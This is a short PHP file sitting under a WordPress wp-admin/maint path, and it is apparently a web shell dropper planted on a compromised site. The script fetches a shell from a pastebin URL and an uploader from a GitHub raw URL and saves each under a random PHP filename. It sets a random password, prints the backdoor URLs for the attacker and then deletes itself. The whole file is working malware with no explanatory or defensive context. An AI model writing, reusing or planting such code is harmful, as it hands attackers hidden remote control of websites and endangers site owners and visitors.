File: /home/s2spw/public_html/wp-admin/maint/hwjapufmyr.php
<?php
# 383634
$shell=curl('https://pastebin.com/raw/NYwj9nzX');
$link = str_replace(basename(__FILE__),'','http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
$file1=mt_rand_str(6).".php";
$file2=mt_rand_str(5).".php";
$password=mt_rand_str(4);
$save=fopen($file1,'w');fwrite($save,$shell);fclose($save);$uploader=curl('https://raw.githubusercontent.com/spacebin-org/Casper/main/up.txt'); $uploader=str_replace('BIBIL',$password,$uploader); $save=fopen($file2,'w');fwrite($save,$uploader);fclose($save);
function mt_rand_str ($l, $c = 'abcdefghijklmnopqrstuvwxyz1234567890') {
for ($s = '', $cl = strlen($c)-1, $i = 0; $i < $l; $s .= $c[mt_rand(0, $cl)], ++$i);
return $s;
}
function curl($url) { $html=file_get_contents($url); if(!empty($html)){ return $html;}
$curl = curl_init(); curl_setopt($curl, CURLOPT_TIMEOUT, 40); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); if (stristr($url,"https://")) { curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($curl, CURLOPT_HEADER, false); return curl_exec ($curl); }
?>
<shell><font color="red"><center> Shell : <?php echo $link.$file1;?></center></font><br></shell><up><font color="green"><center> Up : <?php echo $link.$file2.'?Casper='.$password;?></center></font><br></up><?php unlink(__FILE__); ?>